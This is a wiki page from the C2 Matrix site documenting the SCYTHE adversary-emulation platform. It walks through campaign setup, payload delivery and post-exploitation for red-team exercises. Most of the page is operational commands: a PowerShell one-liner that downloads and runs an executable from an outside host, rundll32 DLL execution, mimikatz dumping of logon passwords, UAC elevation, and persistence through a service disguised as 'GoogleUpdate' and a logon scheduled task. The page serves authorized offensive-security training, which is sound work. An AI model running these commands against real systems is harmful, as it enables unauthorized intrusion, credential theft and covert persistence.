C2 Matrix
Search…
C2 Matrix
The C2 Matrix
SANS Slingshot C2 Matrix VM
Contribute
Lab Infrastructure
C2 Matrix Eval Lab
Basic Lab
Virtual Machines with C2s
Docker
Resources
C2
Caldera
Covenant
Empire
Faction
ibombshell
Koadic
Merlin
Mythic
Nuages
PoshC2
PowerHub
SilentTrinity
Sliver
SCYTHE
TrevorC2
Attack Infrastructure
Resources
Redirectors/Relays
Detection
Basics
Beacons
JA3/JA3S Hashes
JARM
Powered By GitBook
SCYTHE

Setup Campaign

Login to your SCYTHE instance via web browser. Default port is 8443.
Campaign Manager - New Campaign
Select the following options:
  • Name: unique name for the campaign
  • Target Operating System: Windows, Linux, or macOS
  • Restrict Campaign through Execution Guardrails (T1480) by Device, Domain, Start Date, and/or End Date
  • Communication Module:
    • HTTPS is default,
    • DNS, HTTP, and Stego require relays to be installed on redirector
    • Google Sheet and Twitter require third party account/API

Community Threats (Third Party Adversary Emulation Plans)

Download Community Threats from SCYTHE Github: https://github.com/scythe-io/community-threats
Import into SCYTHE: Threat Manager - Migrate Threats - Choose File - Import
Migrate Threats
Use a Threat: Threat Manager - Threat Catalog - Click Threat - Create Campaign from Threat

Deploy Payload

User Execution: Malicious File (T1204.002):

Download the binary to the target system and execute by double clicking.

Signed Binary Proxy Execution: Rundll32 (T1218.011):

Download DLL file from SCYTHE and execute below from a cmd.exe:
rundll32.exe ServiceLogin.dll,PlatformClientMain

Command and Scripting Interpreter: PowerShell (T1059.001)

Open a powershell.exe and run:
$myscriptblock={$url="https://madrid.scythedemo.com/ServiceLogin?active=K17coQ7Y6E-jJExc8Y_-8w&b=false";$wc=New-Object System.Net.WebClient;$output="C:\Users\Public\scythe_payload.exe";$wc.DownloadFile($url,$output);C:\Users\Public\scythe_payload.exe};Invoke-Command -ScriptBlock $myscriptblock;

Emulate TTPs

loader --load run
run whoami
run cmd /c whoami

Load Python Runtime

loader --load-runtime python3
list modules
loader --load "modulename"
"modulename"

Download files

Move file to virtual file system
loader --load downloader
downloader --src VFS:/users/BUILTIN/scythe/DNS_scythe_client32.dll --dest C:\Users\sec564\DNS_scythe_client32.dll

Privilege Escalation (TA0004)

UAC (T1088)

loader --load elevate
elevate --prompt

Credential Access (TA0006)

Credential Dumping (T1003)

loader --load mimikatz
mimikatz --arglist privilege::debug
mimikatz --arglist sekurlsa::logonPasswords

Persistence (TA0003)

New Service (T1050)

loader --load persist
Synatax:
persist --hostname "Hostname" --name "Name of Service" --display "Display Name of Service" --description mysvc --path \\"hostname"\C$\"location"
Example:
persist --hostname WIN10-VICTIM1 --name GoogleUpdate --display GoogleUpdate --description GoogleUpdate --path \\WIN10-VICTIM1\C$\Windows\Temp\GoogleUpdate.exe

Scheduled Task (T1168)

schtasks /create /tn DNS /sc ONLOGON /tr "cmd.exe /k rundll32.exe C:\Users\\DNS_scythe_client32.dll,PlatformClientMain"

Clean up

Persistence:

run sc delete GoogleUpdate
run del C:\Windows\Temp\GoogleUpdate.exe

Kill agent:

controller --shutdown
C2 - Previous
Sliver
Next - C2
TrevorC2
Last modified 2yr ago
Copy link
Outline
Setup Campaign
Community Threats (Third Party Adversary Emulation Plans)
Deploy Payload
User Execution: Malicious File (T1204.002):
Signed Binary Proxy Execution: Rundll32 (T1218.011):
Command and Scripting Interpreter: PowerShell (T1059.001)
Emulate TTPs
Load Python Runtime
Download files
Privilege Escalation (TA0004)
Credential Access (TA0006)
Persistence (TA0003)
Clean up
Persistence:
Kill agent: